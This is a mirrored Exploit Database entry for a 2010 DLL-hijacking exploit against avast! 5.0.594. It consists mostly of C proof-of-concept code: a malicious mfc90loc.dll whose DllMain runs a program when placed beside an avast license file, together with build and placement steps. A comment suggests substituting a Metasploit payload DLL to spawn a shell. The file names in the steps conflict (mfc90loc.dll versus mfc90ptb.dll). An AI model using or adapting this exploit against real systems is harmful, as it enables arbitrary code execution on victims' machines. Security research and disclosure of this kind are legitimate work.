Avast! 5.0.594 – ‘mfc90loc.dll’ License Files DLL Hijacking

• Exploit Database
• 124 阅读

• 作者： diwr
  日期： 2010-08-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14743/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

  /* # Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll) # Date: 25/08/2010 # Author: Bruno Filipe (diwr) http://digitalacropolis.us # Software Link: http://www.avast.com # Version: <= 5.0.594 # Tested on: WinXP SP2, WinXP SP3 # Thx TheLeader ;) # ---------------------------------------------------------------------------------------------------------- # This should work with avast license files (.avastlic) # 1. gcc dllmain.c -o mfc90loc.dll # 2. Put mfc90ptb.dll in the same directory of an avast license file (EG: anything.avastlic) # 3. You can generate a msfpayload DLL and spawn a shell, for example. # ---------------------------------------------------------------------------------------------------------- */   #include <windows.h>   int main() { WinExec("calc", SW_NORMAL); exit(0); return 0; }   BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { main(); return 0; }